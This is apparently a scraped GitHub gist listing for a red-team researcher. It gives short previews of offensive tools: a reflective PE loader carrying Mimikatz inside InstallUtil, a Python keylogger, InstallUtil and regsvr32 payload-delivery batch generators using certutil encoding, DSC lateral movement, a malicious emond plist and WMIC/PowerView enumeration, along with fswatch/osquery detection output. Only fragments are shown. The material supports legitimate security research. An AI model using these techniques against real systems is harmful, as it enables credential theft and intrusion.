Chris Ross xorrior

xorrior / PELoader.cs
Created Jul 12, 2017
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
xorrior / wmic_cmds.txt
Last active Jan 20, 2021
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
xorrior / PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
xorrior /
Created Dec 11, 2017
Python on disk keylogger
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
xorrior / emond-examples.txt
Last active Jun 1, 2020
fswatch and osquery command syntax w/ output
Fswatch command
fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/
Output when event is triggered
'{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}'
osquery.results.log output from event.
{"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"}
xorrior / bad.plist
Last active Jan 21, 2020
Example Malicious emond plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<string>empire rules</string>
xorrior / New-InstallUtilBatchFile.ps1
Created Oct 27, 2016
Generate InstallUtil payload within batch file for delivery
function New-InstallUtilBatchFile
#You must provide an encoded payload using certutil -encode for the InFilePath.
#certutil -encode payload.exe payload.txt
#For compiling w/ a managed powershell runner
# C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:"C:\Windows\assembly\GAC_MSIL\System.Management.Automation\\System.Management.Automation.dll" /out:payload.exe payload.cs
xorrior / messagebox.m
Last active Jul 25, 2019
Installer Plugin that pops a message box to the user
// MyInstallerPane.m
// messagebox
// Created by Chris Ross on 1/23/18.
// Copyright © 2018 testplugin. All rights reserved.
This should be in MyInstallerPane.h
xorrior / New-RegSvr32BatchFile.ps1
Created Oct 28, 2016
Generate a batch file to execute a dll with regsvr32
function New-RegSvr32BatchFile
Generates a batch file which will contain a certutil-encoded, cab-compressed payload.
The batch file will decode and decompress the cab file, then execute the DLL within it with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
xorrior / PowerView-3.0-tricks.ps1
Created Jul 5, 2018 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set